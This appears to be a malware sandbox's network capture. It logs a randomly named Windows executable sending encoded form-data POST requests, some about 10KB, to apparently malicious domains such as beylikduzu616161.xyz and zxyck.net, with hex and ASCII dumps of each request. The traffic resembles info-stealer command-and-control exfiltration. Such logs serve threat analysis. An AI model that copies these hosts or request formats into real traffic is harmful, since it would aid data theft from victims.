                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.superiorfencing.net
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Jan 8, 2025 16:14:10.348237038 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:10 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      21 | 192.168.2.4 | 50023 | 188.114.97.3 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:14:15.400223017 CET | 779 | OUT | POST /2nga/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.beylikduzu616161.xyz
                                                                      Origin: http://www.beylikduzu616161.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.beylikduzu616161.xyz/2nga/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 64 30 73 37 7a 51 51 51 72 62 36 53 66 43 6c 39 55 5a 77 6d 76 74 64 4f 58 55 69 4e 50 73 6c 6d 41 33 43 6f 67 64 67 67 30 55 51 78 56 6d 77 73 49 41 4a 65 39 34 32 6b 30 57 46 69 37 65 37 51 4e 48 76 67 33 34 7a 34 58 62 2b 75 6d 62 65 2f 4b 66 4b 41 43 65 30 44 4c 33 48 4f 78 6a 6d 41 55 4b 6d 38 58 6e 4c 50 4c 61 6d 53 32 6b 59 6f 77 55 33 6e 42 37 54 75 54 73 4a 61 5a 34 6e 43 50 73 51 5a 69 47 44 4c 2f 6f 76 53 6b 6c 6c 73 6a 38 36 4f 78 64 76 45 63 53 52 73 58 44 77 61 4a 55 50 39 4a 38 6e 45 4c 71 6e 4f 53 38 6a 7a 70 36 62 41 32 69 63 76 74 77 55 52 64 58 7a 70 2f 77 3d 3d
                                                                      Data Ascii: xP7x=d0s7zQQQrb6SfCl9UZwmvtdOXUiNPslmA3Cogdgg0UQxVmwsIAJe942k0WFi7e7QNHvg34z4Xb+umbe/KfKACe0DL3HOxjmAUKm8XnLPLamS2kYowU3nB7TuTsJaZ4nCPsQZiGDL/ovSkllsj86OxdvEcSRsXDwaJUP9J8nELqnOS8jzp6bA2icvtwURdXzp/w==
                                                                      Jan 8, 2025 16:14:16.026437044 CET | 845 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tYRZMjvtKDvtYtVb3lYvBpbbqmLG06P6yt9XF5QwA7ZGUcLTM3Q%2BNNmmC4meZ%2FmNdVifSxpekpIcdjl68KTJ2HcBfjbLX7%2FB2x1BhRMRizEqMPJhRL891e7C91C8pYtHsLxZD3zV7rELpGA%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fed22e0aba441df-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1819&rtt_var=909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=779&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                      Data Ascii: 14
                                                                      Jan 8, 2025 16:14:16.026834011 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      22 | 192.168.2.4 | 50024 | 188.114.97.3 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:14:17.941776991 CET | 799 | OUT | POST /2nga/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.beylikduzu616161.xyz
                                                                      Origin: http://www.beylikduzu616161.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.beylikduzu616161.xyz/2nga/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 64 30 73 37 7a 51 51 51 72 62 36 53 65 6d 68 39 53 34 77 6d 70 4e 64 42 4c 6b 69 4e 47 4d 6c 69 41 77 4b 6f 67 63 6b 77 33 67 38 78 56 48 41 73 4a 42 4a 65 2b 34 32 6b 73 6d 46 74 6d 4f 36 39 4e 48 69 66 33 36 33 34 58 61 65 75 6d 5a 32 2f 4b 73 69 48 4e 75 30 57 4e 33 48 41 2b 44 6d 41 55 4b 6d 38 58 6e 66 31 4c 65 4b 53 32 56 49 6f 77 77 6a 6b 50 62 54 76 53 73 4a 61 64 34 6e 47 50 73 51 76 69 48 65 51 2f 75 72 53 6b 6b 56 73 67 6f 4f 52 2f 64 75 42 53 79 52 2f 62 57 45 53 4a 56 71 32 43 64 58 43 4e 72 2f 52 58 36 75 70 34 4c 36 58 6b 69 34 63 77 33 64 6c 51 55 4f 67 6b 31 45 75 32 4b 4c 62 53 50 64 44 31 4c 57 69 33 35 4a 65 59 79 45 3d
                                                                      Data Ascii: xP7x=d0s7zQQQrb6Semh9S4wmpNdBLkiNGMliAwKogckw3g8xVHAsJBJe+42ksmFtmO69NHif3634XaeumZ2/KsiHNu0WN3HA+DmAUKm8Xnf1LeKS2VIowwjkPbTvSsJad4nGPsQviHeQ/urSkkVsgoOR/duBSyR/bWESJVq2CdXCNr/RX6up4L6Xki4cw3dlQUOgk1Eu2KLbSPdD1LWi35JeYyE=
                                                                      Jan 8, 2025 16:14:18.610270977 CET | 856 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5slkb%2FcdyNrovpIyoAJUiiDdbou1Skt4tZCjQWwi8UtTIjfhG%2FkunzltPodJ5iMYNAVtYwkZEwpawvQyBX2cJva90I%2Fqa3NLA%2BsgeoNjPTqIcjxOwL%2Bicx8AXdGrd8x5AUZyb4%2BE1Ae73J0%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fed22f0aae64286-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1772&rtt_var=886&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 140


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      23 | 192.168.2.4 | 50025 | 188.114.97.3 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:14:20.734805107 CET | 10881 | OUT | POST /2nga/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.beylikduzu616161.xyz
                                                                      Origin: http://www.beylikduzu616161.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.beylikduzu616161.xyz/2nga/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 64 30 73 37 7a 51 51 51 72 62 36 53 65 6d 68 39 53 34 77 6d 70 4e 64 42 4c 6b 69 4e 47 4d 6c 69 41 77 4b 6f 67 63 6b 77 33 67 30 78 55 31 59 73 49 69 68 65 2f 34 32 6b 79 57 45 4b 6d 4f 36 46 4e 48 71 62 33 36 36 44 58 66 61 75 6d 36 4f 2f 64 4e 69 48 57 65 30 57 41 58 48 4e 78 6a 6e 4b 55 4b 32 34 58 6e 50 31 4c 65 4b 53 32 57 67 6f 33 6b 33 6b 66 72 54 75 54 73 4a 57 5a 34 6e 2b 50 73 34 2f 69 48 4c 6c 2f 65 4c 53 6e 45 46 73 69 62 6d 52 67 74 75 44 66 53 51 69 62 57 42 4d 4a 56 32 63 43 64 6a 6b 4e 72 62 52 61 74 4c 77 6e 2f 32 56 33 45 55 6d 7a 46 64 59 64 55 47 6b 76 6c 63 6d 33 66 76 51 46 37 64 71 78 70 48 6c 73 72 56 32 4a 46 4f 61 49 71 68 4f 54 2b 65 44 56 62 4f 37 36 51 49 66 76 6f 35 62 61 61 49 47 47 54 51 51 72 64 61 73 4d 37 31 48 6e 6f 2f 49 43 76 55 77 38 5a 2f 37 44 51 39 55 6a 6d 75 77 55 39 75 30 37 63 2b 68 39 66 78 51 55 45 44 32 4a 70 72 55 64 51 44 32 52 37 67 64 36 39 35 42 6e 77 6e 48 6f 47 6f 58 69 5a 33 53 41 75 72 42 45 6e 59 34 2b 6d 64 52 71 69 6c 36 36 [TRUNCATED]
                                                                      Data Ascii: xP7x= [TRUNCATED]
                                                                      Jan 8, 2025 16:14:21.386797905 CET | 856 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2FW46V0Oq5KMVw7ISjMoLV8on3q4mwgE%2BpFRUF1J%2FgMnN1eKtZDRaR%2FJiLQXow9E3I7affssyLs%2FE4cYr5IgLgNpMFlTAOyQkleau2%2FQyhSCRwSxBce3a9soiX19AKkpqf%2FCWrmTnte67NI%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fed2301f9380fa1-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1525&min_rtt=1525&rtt_var=762&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10881&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                      Data Ascii: 14
                                                                      Jan 8, 2025 16:14:21.387602091 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      24 | 192.168.2.4 | 50026 | 188.114.97.3 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:14:23.413286924 CET | 496 | OUT | GET /2nga/?xP7x=Q2EbwnYhq4vEVEYxQpNjsu4gFlGHCs4lBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63ULodNNE679jqiZ5mYQ2jjCrjO82Z0/3agI7E=&F4=Q0yHy HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.beylikduzu616161.xyz
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Jan 8, 2025 16:14:24.015753031 CET | 798 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F10gPv6OCHsUQcbfnGTrcEBymziWM5TIYElYGd2j1jnYhgEGNyAZ8UrI78sAt3xZIZnDBcu3eVWj9HqAQAKUZ3Ok6S%2BALvIx6a9MuPrfHqEmoujCAqYF7yRZIDJQLZI4bb%2BURB3kPstjEPg%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fed231288975e80-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1746&rtt_var=873&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=496&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      25 | 192.168.2.4 | 50027 | 118.107.250.103 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:14:29.541709900 CET | 746 | OUT | POST /gxyh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zxyck.net
                                                                      Origin: http://www.zxyck.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.zxyck.net/gxyh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 38 67 48 6f 74 56 30 30 6d 75 78 56 64 2f 45 77 78 34 44 52 6f 79 68 6a 4c 45 76 36 34 43 64 6b 6d 7a 4e 65 4d 53 71 38 33 54 70 6a 78 31 59 6c 69 4e 71 47 63 58 68 55 76 2f 34 4f 64 4e 4d 4a 65 64 68 64 53 79 6b 2b 4b 31 52 55 6f 37 59 6e 4c 62 4c 7a 79 67 4d 42 59 71 45 35 44 73 42 6e 67 37 6f 6f 78 35 38 71 78 6c 43 73 62 55 79 69 37 41 32 68 56 74 74 69 6c 48 4d 4d 4b 34 4a 43 75 5a 2f 5a 6a 58 38 6e 6a 57 38 77 38 31 37 69 49 64 77 32 64 6d 47 54 30 6b 72 34 74 5a 35 4e 36 47 31 46 33 49 6b 49 45 4c 33 6e 6d 37 56 38 59 50 4b 35 50 6a 77 79 44 6f 39 53 4e 79 37 4a 4c 51 3d 3d
                                                                      Data Ascii: xP7x=8gHotV00muxVd/Ewx4DRoyhjLEv64CdkmzNeMSq83Tpjx1YliNqGcXhUv/4OdNMJedhdSyk+K1RUo7YnLbLzygMBYqE5DsBng7oox58qxlCsbUyi7A2hVttilHMMK4JCuZ/ZjX8njW8w817iIdw2dmGT0kr4tZ5N6G1F3IkIEL3nm7V8YPK5PjwyDo9SNy7JLQ==
                                                                      Jan 8, 2025 16:14:30.383698940 CET | 308 | IN | HTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 08 Jan 2025 15:13:00 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2e///l=,0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      26 | 192.168.2.4 | 50028 | 118.107.250.103 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:14:32.123348951 CET | 766 | OUT | POST /gxyh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zxyck.net
                                                                      Origin: http://www.zxyck.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.zxyck.net/gxyh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 38 67 48 6f 74 56 30 30 6d 75 78 56 66 66 30 77 32 5a 44 52 75 53 68 69 56 30 76 36 71 43 64 67 6d 7a 42 65 4d 54 2f 68 33 68 39 6a 77 51 6b 6c 77 38 71 47 66 58 68 55 6b 66 35 4b 54 74 4d 53 65 64 6b 69 53 78 38 2b 4b 31 46 55 6f 35 51 6e 4c 4b 4c 79 67 41 4d 48 51 4b 45 2f 48 73 42 6e 67 37 6f 6f 78 35 6f 41 78 6c 61 73 61 6b 43 69 30 43 65 2b 57 74 74 68 78 58 4d 4d 4f 34 49 71 75 5a 2f 33 6a 54 39 76 6a 51 34 77 38 77 66 69 49 73 77 78 45 32 47 5a 37 45 72 71 68 35 30 55 39 44 34 74 39 4f 4d 50 4c 61 7a 52 6a 39 59 6d 4a 2b 72 75 64 6a 55 42 65 76 30 6d 41 78 47 41 51 65 54 66 37 68 50 57 65 37 70 61 79 4a 59 45 30 79 38 42 79 44 55 3d
                                                                      Data Ascii: xP7x=8gHotV00muxVff0w2ZDRuShiV0v6qCdgmzBeMT/h3h9jwQklw8qGfXhUkf5KTtMSedkiSx8+K1FUo5QnLKLygAMHQKE/HsBng7oox5oAxlasakCi0Ce+WtthxXMMO4IquZ/3jT9vjQ4w8wfiIswxE2GZ7Erqh50U9D4t9OMPLazRj9YmJ+rudjUBev0mAxGAQeTf7hPWe7payJYE0y8ByDU=
                                                                      Jan 8, 2025 16:14:32.991274118 CET | 308 | IN | HTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 08 Jan 2025 15:13:02 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2e///l=,0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      27 | 192.168.2.4 | 50029 | 118.107.250.103 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:14:34.693032980 CET | 10848 | OUT | POST /gxyh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zxyck.net
                                                                      Origin: http://www.zxyck.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.zxyck.net/gxyh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 38 67 48 6f 74 56 30 30 6d 75 78 56 66 66 30 77 32 5a 44 52 75 53 68 69 56 30 76 36 71 43 64 67 6d 7a 42 65 4d 54 2f 68 33 68 6c 6a 77 6d 77 6c 68 72 47 47 65 58 68 55 6e 66 35 4a 54 74 4e 49 65 5a 49 6d 53 32 31 44 4b 33 39 55 70 62 6f 6e 65 4f 58 79 35 77 4d 48 63 71 45 36 44 73 42 79 67 37 34 6b 78 35 34 41 78 6c 61 73 61 6d 61 69 77 51 32 2b 61 4e 74 69 6c 48 4d 32 4b 34 4a 48 75 5a 47 4b 6a 54 77 4e 69 67 59 77 38 51 50 69 4b 2b 59 78 62 6d 47 66 38 45 71 35 68 35 34 78 39 44 4d 50 39 4b 45 70 4c 61 48 52 75 73 42 73 4e 2b 37 6c 47 30 73 41 42 66 46 46 5a 47 54 42 59 65 66 37 38 6a 6a 61 46 4b 74 4a 30 75 67 4a 67 54 51 46 6d 33 75 58 6a 56 53 69 73 52 68 42 62 41 63 6b 44 36 46 74 4b 35 4e 6b 39 46 70 48 79 66 50 34 73 7a 4c 63 2b 5a 53 36 34 62 46 38 34 6b 50 4f 63 49 39 41 31 6c 4c 64 46 2b 77 34 7a 36 51 6d 7a 39 47 39 4e 37 30 48 62 2f 30 62 35 5a 61 4f 46 4c 34 73 6d 7a 73 4a 51 32 73 76 34 57 50 4f 64 61 4d 73 71 6f 5a 32 4c 37 54 58 39 72 59 38 36 78 55 47 66 42 6d 51 36 [TRUNCATED]
                                                                      Data Ascii: xP7x=8gHotV00muxVff0w2ZDRuShiV0v6qCdgmzBeMT/h3hljwmwlhrGGeXhUnf5JTtNIeZImS21DK39UpboneOXy5wMHcqE6DsByg74kx54AxlasamaiwQ2+aNtilHM2K4JHuZGKjTwNigYw8QPiK+YxbmGf8Eq5h54x9DMP9KEpLaHRusBsN+7lG0sABfFFZGTBYef78jjaFKtJ0ugJgTQFm3uXjVSisRhBbAckD6FtK5Nk9FpHyfP4szLc+ZS64bF84kPOcI9A1lLdF+w4z6Qmz9G9N70Hb/0b5ZaOFL4smzsJQ2sv4WPOdaMsqoZ2L7TX9rY86xUGfBmQ6+RC4SJIwn0yjGbC+V+j14+TvvzX9tGxzZzyUt0il5k0atdH9gIjV4Uztc3zPZr15u8c3pm9gbqQ9FLRm6vI1EXX/3YOMR12bedmwfHfv1CCxqRxL51ux/xfnMkA2nFrj0RyxgN134zOLwL5jfzkxj/YOz3wxGaU8x5HkPQqG0FRTSfNMvrmgWV6qPDqoj69I/4JBuKA/Esw/BHTb6Cnge9puVo3MjH+sxtxuMjYSoddnoA9HKfQriwRH4EJ6pXMN+lQR8Ht6bkNxod9kQQLRmcXONvUytRYSVNb/cGTKs2CnYxKHtqRFoq4hcmctlqTeDTGZl2O1V22hKwpIEVwNckTcWsp9t4zPc5zCa7FNZpFzNQ1fyG2kfOZ0iw4oriyaAXbCBzuUYfO+fP6SX9fb/mFkKjLKoN5BXwub35U0AmbdDRWKTMyeWVLRhR3KhM3J+M/ftAXKNpUmlUZ7UXze8lFr0cw/sOvJQBaXmC5mG7GJV1WVfl1L3FNaDY1lYIBw0r/u9wlQgUF/NeXA17MrCfusfEZPzfBj70jbPxasyPKso/ngg3KoQEySzEbIj4dWHKueG73TstuNoMvHzuEJXv7Esp5OAAum+GeDGZZ5356M4Q+RX9jbEObyYMEzVdYKyZt/RN+V/6N6LP88jsBCslMPCjbNg8aJQv [TRUNCATED]
                                                                      Jan 8, 2025 16:14:35.548619986 CET | 308 | IN | HTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 08 Jan 2025 15:13:05 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2e///l=,0


